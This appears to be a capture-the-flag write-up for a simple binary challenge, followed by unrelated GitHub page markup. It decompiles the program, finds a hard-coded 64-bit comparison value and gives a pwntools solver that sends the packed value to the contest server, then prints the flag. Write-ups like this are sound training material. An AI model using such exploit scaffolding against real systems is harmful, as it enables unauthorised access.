```$ file secret; checksec secret secret: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=c218ee479df643755efef28fb34263d506c68e61, not stripped[*] '/home/kali/Documents/TFC CTF/secret' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: PIE enabled```
Let's try to run it
```Tell me a secretchicken nuggetI have already heard that one, sorry```
It seems that the program will print `I have already heard that one, sorry` if the input doesn't match the if condition. Let's open the program using ida to see what the source code looks like.
```cint __cdecl main(int argc, const char **argv, const char **envp){ char s[8]; // [rsp+0h] [rbp-20h] __int64 v5; // [rsp+8h] [rbp-18h] __int64 v6; // [rsp+10h] [rbp-10h] __int64 v7; // [rsp+18h] [rbp-8h]
setvbuf(_bss_start, 0LL, 2, 0LL); puts("Tell me a secret"); *(_QWORD *)s = 0LL; v5 = 0LL; v6 = 0LL; v7 = 0LL; fgets(s, 32, stdin); if ( *(_QWORD *)s == -6144092014192636707LL ) { puts("hmm, interesting"); system("cat flag"); putchar(10); } else { puts("I have already heard that one, sorry"); } return 0;}```
From the main function, it seems that we need to match the if condition. But the number is too large, let's see it in the other forms by right click the number and choose the other forms.
Let's try change it into hexadecimal```cif ( *(_QWORD *)s == 0xAABBCCDDAABBCCDDLL ) { puts("hmm, interesting"); system("cat flag"); putchar(10); }```
From the hexadecimal, now we know that we can use 0xAABBCCDDAABBCCDD or 0xaabbccddaabbccdd (it is the same) for the input to the challenge and we don't need to input the `LL`. Let's try input it manually```$ ./secretTell me a secret0xaabbccddaabbccddI have already heard that one, sorry```
We know that the input are correct. But it doesn't give the flags. Since the program are in 64 bit, the layout might not be match. So let's use pwntools library to pack the input into 64 bit format.
## Exploit
Let's make a solver using python```pythonfrom pwn import *
secret = 0xaabbccddaabbccdd
s = process("./secret")
print(s.recvline())s.sendline(p64(secret))print(s.recvall().decode())
s.close()```
Now we need to do is just run the program to make sure it works!
Since it works, lets test on remote server by adding host, port and replacing `s = process("./secret")` to `s = remote(host, port)`
```pythonfrom pwn import *
host = "server.challenge.ctf.thefewchosen.com"port = 1342
secret = 0xaabbccddaabbccdd
s = remote(host, port)
print(s.recvline())s.sendline(p64(secret))print(s.recvall().decode())
s.close()```
Now all we need to do is just run the program
Flag: `TFCCTF{Y0ur_s3cret_1s_s4f3_w1th_m3!}` |
<html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark" data-a11y-animated-images="system"> <head> <meta charset="utf-8"> <link rel="dns-prefetch" href="https://github.githubassets.com"> <link rel="dns-prefetch" href="https://avatars.githubusercontent.com"> <link rel="dns-prefetch" href="https://github-cloud.s3.amazonaws.com"> <link rel="dns-prefetch" href="https://user-images.githubusercontent.com/"> <link rel="preconnect" href="https://github.githubassets.com" crossorigin> <link rel="preconnect" href="https://avatars.githubusercontent.com">
<link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/light-fe3f886b577a.css" /><link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/dark-a1dbeda2886c.css" /><link data-color-theme="dark_dimmed" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_dimmed-1ad5cf51dfeb.css" /><link data-color-theme="dark_high_contrast" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_high_contrast-11d3505dc06a.css" /><link data-color-theme="dark_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_colorblind-8b800495504f.css" /><link data-color-theme="light_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_colorblind-daa38c88b795.css" /><link data-color-theme="light_high_contrast" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_high_contrast-1b9ea565820a.css" /><link data-color-theme="light_tritanopia" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_tritanopia-e4be9332dd6c.css" /><link data-color-theme="dark_tritanopia" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_tritanopia-0dcf95848dd5.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/primer-c581c4e461bb.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/global-0e278d45156f.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/github-dcaf0f44dbb1.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/code-26709f54a08d.css" />
<script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/wp-runtime-774bfe5ae983.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_stacktrace-parser_dist_stack-trace-parser_esm_js-node_modules_github_bro-327bbf-0aaeb22dd2a5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/ui_packages_soft-nav_soft-nav_ts-21fc7a4a0e8f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/environment-e059fd03252f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_selector-observer_dist_index_esm_js-2646a2c533e3.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_details-dialog-elemen-63debe-c04540d458d4.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_relative-time-element_dist_index_js-b9368a9cb79e.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_fzy_js_index_js-node_modules_github_markdown-toolbar-element_dist_index_js-e3de700a4c9d.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_auto-complete-element_dist_index_js-node_modules_github_catalyst_-6afc16-e779583c369f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_github_text-ex-3415a8-7ecc10fb88d0.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_remote-inp-79182d-befd2b2f5880.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_view-components_app_components_primer_primer_js-node_modules_gith-6a1af4-df3bc95b06d3.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/github-elements-fc0e0b89822a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/element-registry-1641411db24a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_lit-html_lit-html_js-9d9fe1859ce5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_manuelpuyol_turbo_dist_turbo_es2017-esm_js-4140d67f0cc2.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_github_alive-client_dist-bf5aa2-424aa982deef.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_dimensions_js-node_modules_github_hotkey_dist_-9fc4f4-d434ddaf3207.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_color-convert_index_js-35b3ae68c408.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_github_session-resume_dist-def857-2a32d97c93c5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_paste-markdown_dist_index_esm_js-node_modules_github_quote-select-15ddcc-1512e06cfee0.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_updatable-content_ts-430cacb5f7df.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_keyboard-shortcuts-helper_ts-app_assets_modules_github_be-f5afdb-8dd5f026c5b9.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_sticky-scroll-into-view_ts-0af96d15a250.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_include-fragment_ts-app_assets_modules_github_behaviors_r-4077b4-75370d1c1705.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_assets_modules_github_behaviors_ht-83c235-7883159efa9e.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/behaviors-742151da9690.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_catalyst_lib_index_js-06ff531-32d7d1e94817.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/notifications-global-f5b58d24780b.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_morphdom_dist_morphdom-esm_js-node_modules_github_template-parts_lib_index_js-58417dae193c.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_virtualized-list_es_index_js-node_modules_github_memoize_dist_esm_index_js-8496b7c4b809.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-70450e-0370b887db62.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_ref-selector_ts-7bdefeb88a1a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/codespaces-d1ede1f1114e.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_mini-throt-a33094-b03defd3289b.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_github_mini-th-85225b-226fc85f9b72.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/repositories-8093725f8825.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/topic-suggestions-7a1f0da7430a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/code-menu-89d93a449480.js"></script>
<title>CTF-Writeups/idekCTF-2021/pwn at main · GonTanaka/CTF-Writeups · GitHub</title>
<meta name="route-pattern" content="/:user_id/:repository/tree/*name(/*path)">
<meta name="current-catalog-service-hash" content="343cff545437bc2b0304c97517abf17bb80d9887520078e9757df416551ef5d6">
<meta name="request-id" content="88BE:380B:41B5D8A:432E08E:64121C56" data-pjax-transient="true"/><meta name="html-safe-nonce" content="4e665b7f1a621a9d92fb9ef566aa3ee4dcfc3d25cad16d53194ad5cdaf33dcb6" data-pjax-transient="true"/><meta name="visitor-payload" content="eyJyZWZlcnJlciI6IiIsInJlcXVlc3RfaWQiOiI4OEJFOjM4MEI6NDFCNUQ4QTo0MzJFMDhFOjY0MTIxQzU2IiwidmlzaXRvcl9pZCI6Ijc4OTMwNjQ4MDY4OTQyNzk3NjYiLCJyZWdpb25fZWRnZSI6ImZyYSIsInJlZ2lvbl9yZW5kZXIiOiJmcmEifQ==" data-pjax-transient="true"/><meta name="visitor-hmac" content="bdc16f26ea160c649f481a3373eec75621dc1faf179f88969347b2c65ac4c563" data-pjax-transient="true"/>
<meta name="hovercard-subject-tag" content="repository:437949506" data-turbo-transient>
<meta name="github-keyboard-shortcuts" content="repository,source-code,file-tree" data-turbo-transient="true" />
<meta name="selected-link" value="repo_source" data-turbo-transient>
<meta name="google-site-verification" content="c1kuD-K2HIVF635lypcsWPoD4kilo5-jA_wBFyT4uMY"> <meta name="google-site-verification" content="KT5gs8h0wvaagLKAVWq8bbeNwnZZK1r1XQysX3xurLU"> <meta name="google-site-verification" content="ZzhVyEFwb7w3e0-uOTltm8Jsck2F5StVihD0exw2fsA"> <meta name="google-site-verification" content="GXs5KoUUkNCoaAZn7wPN-t01Pywp9M3sEjnt_3_ZWPc"> <meta name="google-site-verification" content="Apib7-x98H0j5cPqHWwSMm6dNU4GmODRoqxLiDzdx9I">
<meta name="octolytics-url" content="https://collector.github.com/github/collect" />
<meta name="analytics-location" content="/<user-name>/<repo-name>/files/disambiguate" data-turbo-transient="true" />
<meta name="user-login" content="">
<meta name="viewport" content="width=device-width"> <meta name="description" content="CTF Challenges Writeups. Contribute to GonTanaka/CTF-Writeups development by creating an account on GitHub."> <link rel="search" type="application/opensearchdescription+xml" href="/opensearch.xml" title="GitHub"> <link rel="fluid-icon" href="https://github.com/fluidicon.png" title="GitHub"> <meta property="fb:app_id" content="1401488693436528"> <meta name="apple-itunes-app" content="app-id=1477376905" /> <meta name="twitter:image:src" content="https://opengraph.githubassets.com/5076c5485b99dc8930ec5aceeb8c270f5192b99906f8dc16dcb8e4404c5e05da/GonTanaka/CTF-Writeups" /><meta name="twitter:site" content="@github" /><meta name="twitter:card" content="summary_large_image" /><meta name="twitter:title" content="CTF-Writeups/idekCTF-2021/pwn at main · GonTanaka/CTF-Writeups" /><meta name="twitter:description" content="CTF Challenges Writeups. Contribute to GonTanaka/CTF-Writeups development by creating an account on GitHub." /> <meta property="og:image" content="https://opengraph.githubassets.com/5076c5485b99dc8930ec5aceeb8c270f5192b99906f8dc16dcb8e4404c5e05da/GonTanaka/CTF-Writeups" /><meta property="og:image:alt" content="CTF Challenges Writeups. Contribute to GonTanaka/CTF-Writeups development by creating an account on GitHub." /><meta property="og:image:width" content="1200" /><meta property="og:image:height" content="600" /><meta property="og:site_name" content="GitHub" /><meta property="og:type" content="object" /><meta property="og:title" content="CTF-Writeups/idekCTF-2021/pwn at main · GonTanaka/CTF-Writeups" /><meta property="og:url" content="https://github.com/GonTanaka/CTF-Writeups" /><meta property="og:description" content="CTF Challenges Writeups. Contribute to GonTanaka/CTF-Writeups development by creating an account on GitHub." /> <link rel="assets" href="https://github.githubassets.com/">
<meta name="hostname" content="github.com">
<meta name="expected-hostname" content="github.com">
<meta name="enabled-features" content="TURBO_EXPERIMENT_RISKY,IMAGE_METRIC_TRACKING,GEOJSON_AZURE_MAPS">
<meta http-equiv="x-pjax-version" content="ef97471de14f8d2285f0269e8f0f7dc70845f693d3f6ccd2dd2daae5cd1bbebe" data-turbo-track="reload"> <meta http-equiv="x-pjax-csp-version" content="2a84822a832da97f1ea76cf989a357ec70c85713a2fd8f14c8421b76bbffe38c" data-turbo-track="reload"> <meta http-equiv="x-pjax-css-version" content="adfc12179419e463f9f320d07920b1684c9b7e060d4d9cd3a6cd5d0de37ce710" data-turbo-track="reload"> <meta http-equiv="x-pjax-js-version" content="711646ae23abb27cf728346f30f81c042d4428233a0795acf0e21ed664fe9d94" data-turbo-track="reload">
<meta name="turbo-cache-control" content="no-preview" data-turbo-transient="">
<meta data-hydrostats="publish">
<meta name="go-import" content="github.com/GonTanaka/CTF-Writeups git https://github.com/GonTanaka/CTF-Writeups.git">
<meta name="octolytics-dimension-user_id" content="96073448" /><meta name="octolytics-dimension-user_login" content="GonTanaka" /><meta name="octolytics-dimension-repository_id" content="437949506" /><meta name="octolytics-dimension-repository_nwo" content="GonTanaka/CTF-Writeups" /><meta name="octolytics-dimension-repository_public" content="true" /><meta name="octolytics-dimension-repository_is_fork" content="false" /><meta name="octolytics-dimension-repository_network_root_id" content="437949506" /><meta name="octolytics-dimension-repository_network_root_nwo" content="GonTanaka/CTF-Writeups" />
<link rel="canonical" href="https://github.com/GonTanaka/CTF-Writeups/tree/main/idekCTF-2021/pwn" data-turbo-transient> <meta name="turbo-body-classes" content="logged-out env-production page-responsive">
<meta name="browser-stats-url" content="https://api.github.com/_private/browser/stats">
<meta name="browser-errors-url" content="https://api.github.com/_private/browser/errors">
<meta name="browser-optimizely-client-errors-url" content="https://api.github.com/_private/browser/optimizely_client/errors">
<link rel="mask-icon" href="https://github.githubassets.com/pinned-octocat.svg" color="#000000"> <link rel="alternate icon" class="js-site-favicon" type="image/png" href="https://github.githubassets.com/favicons/favicon.png"> <link rel="icon" class="js-site-favicon" type="image/svg+xml" href="https://github.githubassets.com/favicons/favicon.svg">
<meta name="theme-color" content="#1e2327"><meta name="color-scheme" content="light dark" />
<link rel="manifest" href="/manifest.json" crossOrigin="use-credentials">
</head>
<body class="logged-out env-production page-responsive" style="word-wrap: break-word;"> <div data-turbo-body class="logged-out env-production page-responsive" style="word-wrap: break-word;">
<div class="position-relative js-header-wrapper "> Skip to content <span> <span></span></span>
<script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-94fd67-04fa93bb158a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/sessions-9920eaa99f50.js"></script><header class="Header-old header-logged-out js-details-container Details position-relative f4 py-3" role="banner"> <button type="button" class="Header-backdrop d-lg-none border-0 position-fixed top-0 left-0 width-full height-full js-details-target" aria-label="Toggle navigation"> <span>Toggle navigation</span> </button>
<div class="container-xl d-flex flex-column flex-lg-row flex-items-center p-responsive height-full position-relative z-1"> <div class="d-flex flex-justify-between flex-items-center width-full width-lg-auto"> <svg height="32" aria-hidden="true" viewBox="0 0 16 16" version="1.1" width="32" data-view-component="true" class="octicon octicon-mark-github"> <path d="M8 0c4.42 0 8 3.58 8 8a8.013 8.013 0 0 1-5.45 7.59c-.4.08-.55-.17-.55-.38 0-.27.01-1.13.01-2.2 0-.75-.25-1.23-.54-1.48 1.78-.2 3.65-.88 3.65-3.95 0-.88-.31-1.59-.82-2.15.08-.2.36-1.02-.08-2.12 0 0-.67-.22-2.2.82-.64-.18-1.32-.27-2-.27-.68 0-1.36.09-2 .27-1.53-1.03-2.2-.82-2.2-.82-.44 1.1-.16 1.92-.08 2.12-.51.56-.82 1.28-.82 2.15 0 3.06 1.86 3.75 3.64 3.95-.23.2-.44.55-.51 1.07-.46.21-1.61.55-2.33-.66-.15-.24-.6-.83-1.23-.82-.67.01-.27.38.01.53.34.19.73.9.82 1.13.16.45.68 1.31 2.69.94 0 .67.01 1.3.01 1.49 0 .21-.15.45-.55.38A7.995 7.995 0 0 1 0 8c0-4.42 3.58-8 8-8Z"></path></svg>
<div class="flex-1"> Sign up </div>
<div class="flex-1 flex-order-2 text-right"> <button aria-label="Toggle navigation" aria-expanded="false" type="button" data-view-component="true" class="js-details-target Button--link Button--medium Button d-lg-none color-fg-inherit p-1"> <span> <span><div class="HeaderMenu-toggle-bar rounded my-1"></div> <div class="HeaderMenu-toggle-bar rounded my-1"></div> <div class="HeaderMenu-toggle-bar rounded my-1"></div></span> </span></button> </div> </div>
<div class="HeaderMenu--logged-out p-responsive height-fit position-lg-relative d-lg-flex flex-column flex-auto pt-7 pb-4 top-0"> <div class="header-menu-wrapper d-flex flex-column flex-self-end flex-lg-row flex-justify-between flex-auto p-3 p-lg-0 rounded rounded-lg-0 mt-3 mt-lg-0"> <nav class="mt-0 px-3 px-lg-0 mb-3 mb-lg-0" aria-label="Global"> <button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Product <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 d-lg-flex dropdown-menu-wide">
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-workflow color-fg-subtle mr-3"> <path d="M1 3a2 2 0 0 1 2-2h6.5a2 2 0 0 1 2 2v6.5a2 2 0 0 1-2 2H7v4.063C7 16.355 7.644 17 8.438 17H12.5v-2.5a2 2 0 0 1 2-2H21a2 2 0 0 1 2 2V21a2 2 0 0 1-2 2h-6.5a2 2 0 0 1-2-2v-2.5H8.437A2.939 2.939 0 0 1 5.5 15.562V11.5H3a2 2 0 0 1-2-2Zm2-.5a.5.5 0 0 0-.5.5v6.5a.5.5 0 0 0 .5.5h6.5a.5.5 0 0 0 .5-.5V3a.5.5 0 0 0-.5-.5ZM14.5 14a.5.5 0 0 0-.5.5V21a.5.5 0 0 0 .5.5H21a.5.5 0 0 0 .5-.5v-6.5a.5.5 0 0 0-.5-.5Z"></path></svg> <div> <div class="color-fg-default h4">Actions</div> Automate any workflow </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-package color-fg-subtle mr-3"> <path d="M12.876.64V.639l8.25 4.763c.541.313.875.89.875 1.515v9.525a1.75 1.75 0 0 1-.875 1.516l-8.25 4.762a1.748 1.748 0 0 1-1.75 0l-8.25-4.763a1.75 1.75 0 0 1-.875-1.515V6.917c0-.625.334-1.202.875-1.515L11.126.64a1.748 1.748 0 0 1 1.75 0Zm-1 1.298L4.251 6.34l7.75 4.474 7.75-4.474-7.625-4.402a.248.248 0 0 0-.25 0Zm.875 19.123 7.625-4.402a.25.25 0 0 0 .125-.216V7.639l-7.75 4.474ZM3.501 7.64v8.803c0 .09.048.172.125.216l7.625 4.402v-8.947Z"></path></svg> <div> <div class="color-fg-default h4">Packages</div> Host and manage packages </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-shield-check color-fg-subtle mr-3"> <path d="M16.53 9.78a.75.75 0 0 0-1.06-1.06L11 13.19l-1.97-1.97a.75.75 0 0 0-1.06 1.06l2.5 2.5a.75.75 0 0 0 1.06 0l5-5Z"></path><path d="m12.54.637 8.25 2.675A1.75 1.75 0 0 1 22 4.976V10c0 6.19-3.771 10.704-9.401 12.83a1.704 1.704 0 0 1-1.198 0C5.77 20.705 2 16.19 2 10V4.976c0-.758.489-1.43 1.21-1.664L11.46.637a1.748 1.748 0 0 1 1.08 0Zm-.617 1.426-8.25 2.676a.249.249 0 0 0-.173.237V10c0 5.46 3.28 9.483 8.43 11.426a.199.199 0 0 0 .14 0C17.22 19.483 20.5 15.461 20.5 10V4.976a.25.25 0 0 0-.173-.237l-8.25-2.676a.253.253 0 0 0-.154 0Z"></path></svg> <div> <div class="color-fg-default h4">Security</div> Find and fix vulnerabilities </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-codespaces color-fg-subtle mr-3"> <path d="M3.5 3.75C3.5 2.784 4.284 2 5.25 2h13.5c.966 0 1.75.784 1.75 1.75v7.5A1.75 1.75 0 0 1 18.75 13H5.25a1.75 1.75 0 0 1-1.75-1.75Zm-2 12c0-.966.784-1.75 1.75-1.75h17.5c.966 0 1.75.784 1.75 1.75v4a1.75 1.75 0 0 1-1.75 1.75H3.25a1.75 1.75 0 0 1-1.75-1.75ZM5.25 3.5a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h13.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25Zm-2 12a.25.25 0 0 0-.25.25v4c0 .138.112.25.25.25h17.5a.25.25 0 0 0 .25-.25v-4a.25.25 0 0 0-.25-.25Z"></path><path d="M10 17.75a.75.75 0 0 1 .75-.75h6.5a.75.75 0 0 1 0 1.5h-6.5a.75.75 0 0 1-.75-.75Zm-4 0a.75.75 0 0 1 .75-.75h.5a.75.75 0 0 1 0 1.5h-.5a.75.75 0 0 1-.75-.75Z"></path></svg> <div> <div class="color-fg-default h4">Codespaces</div> Instant dev environments </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-copilot color-fg-subtle mr-3"> <path d="M9.75 14a.75.75 0 0 1 .75.75v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 .75-.75Zm4.5 0a.75.75 0 0 1 .75.75v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 .75-.75Z"></path><path d="M12 2c2.214 0 4.248.657 5.747 1.756.136.099.268.204.397.312.584.235 1.077.546 1.474.952.85.869 1.132 2.037 1.132 3.368 0 .368-.014.733-.052 1.086l.633 1.478.043.022A4.75 4.75 0 0 1 24 15.222v1.028c0 .529-.309.987-.565 1.293-.28.336-.636.653-.966.918a13.84 13.84 0 0 1-1.299.911l-.024.015-.006.004-.039.025c-.223.135-.45.264-.68.386-.46.245-1.122.571-1.941.895C16.845 21.344 14.561 22 12 22c-2.561 0-4.845-.656-6.479-1.303a19.046 19.046 0 0 1-1.942-.894 14.081 14.081 0 0 1-.535-.3l-.144-.087-.04-.025-.006-.004-.024-.015a13.16 13.16 0 0 1-1.299-.911 6.913 6.913 0 0 1-.967-.918C.31 17.237 0 16.779 0 16.25v-1.028a4.75 4.75 0 0 1 2.626-4.248l.043-.022.633-1.478a10.195 10.195 0 0 1-.052-1.086c0-1.331.282-2.498 1.132-3.368.397-.406.89-.717 1.474-.952.129-.108.261-.213.397-.312C7.752 2.657 9.786 2 12 2Zm-8 9.654v6.669a17.59 17.59 0 0 0 2.073.98C7.595 19.906 9.686 20.5 12 20.5c2.314 0 4.405-.594 5.927-1.197a17.59 17.59 0 0 0 2.073-.98v-6.669l-.038-.09c-.046.061-.095.12-.145.177-.793.9-2.057 1.259-3.782 1.259-1.59 0-2.738-.544-3.508-1.492a4.323 4.323 0 0 1-.355-.508h-.344a4.323 4.323 0 0 1-.355.508C10.704 12.456 9.555 13 7.965 13c-1.725 0-2.989-.359-3.782-1.259a3.026 3.026 0 0 1-.145-.177Zm6.309-1.092c.445-.547.708-1.334.851-2.301.057-.357.087-.718.09-1.079v-.031c-.001-.762-.166-1.26-.43-1.568l-.008-.01c-.341-.391-1.046-.689-2.533-.529-1.505.163-2.347.537-2.824 1.024-.462.473-.705 1.18-.705 2.32 0 .605.044 1.087.135 1.472.092.384.231.672.423.89.365.413 1.084.75 2.657.75.91 0 1.527-.223 1.964-.564.14-.11.268-.235.38-.374Zm2.504-2.497c.136 1.057.403 1.913.878 2.497.442.545 1.134.938 2.344.938 1.573 0 2.292-.337 2.657-.751.384-.435.558-1.151.558-2.361 0-1.14-.243-1.847-.705-2.319-.477-.488-1.318-.862-2.824-1.025-1.487-.161-2.192.139-2.533.529-.268.308-.437.808-.438 1.578v.02c.002.299.023.598.063.894Z"></path></svg> <div> <div class="color-fg-default h4">Copilot</div> Write better code with AI </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-code-review color-fg-subtle mr-3"> <path d="M10.3 6.74a.75.75 0 0 1-.04 1.06l-2.908 2.7 2.908 2.7a.75.75 0 1 1-1.02 1.1l-3.5-3.25a.75.75 0 0 1 0-1.1l3.5-3.25a.75.75 0 0 1 1.06.04Zm3.44 1.06a.75.75 0 1 1 1.02-1.1l3.5 3.25a.75.75 0 0 1 0 1.1l-3.5 3.25a.75.75 0 1 1-1.02-1.1l2.908-2.7-2.908-2.7Z"></path><path d="M1.5 4.25c0-.966.784-1.75 1.75-1.75h17.5c.966 0 1.75.784 1.75 1.75v12.5a1.75 1.75 0 0 1-1.75 1.75h-9.69l-3.573 3.573A1.458 1.458 0 0 1 5 21.043V18.5H3.25a1.75 1.75 0 0 1-1.75-1.75ZM3.25 4a.25.25 0 0 0-.25.25v12.5c0 .138.112.25.25.25h2.5a.75.75 0 0 1 .75.75v3.19l3.72-3.72a.749.749 0 0 1 .53-.22h10a.25.25 0 0 0 .25-.25V4.25a.25.25 0 0 0-.25-.25Z"></path></svg> <div> <div class="color-fg-default h4">Code review</div> Manage code changes </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-issue-opened color-fg-subtle mr-3"> <path d="M12 1c6.075 0 11 4.925 11 11s-4.925 11-11 11S1 18.075 1 12 5.925 1 12 1ZM2.5 12a9.5 9.5 0 0 0 9.5 9.5 9.5 9.5 0 0 0 9.5-9.5A9.5 9.5 0 0 0 12 2.5 9.5 9.5 0 0 0 2.5 12Zm9.5 2a2 2 0 1 1-.001-3.999A2 2 0 0 1 12 14Z"></path></svg> <div> <div class="color-fg-default h4">Issues</div> Plan and track work </div>
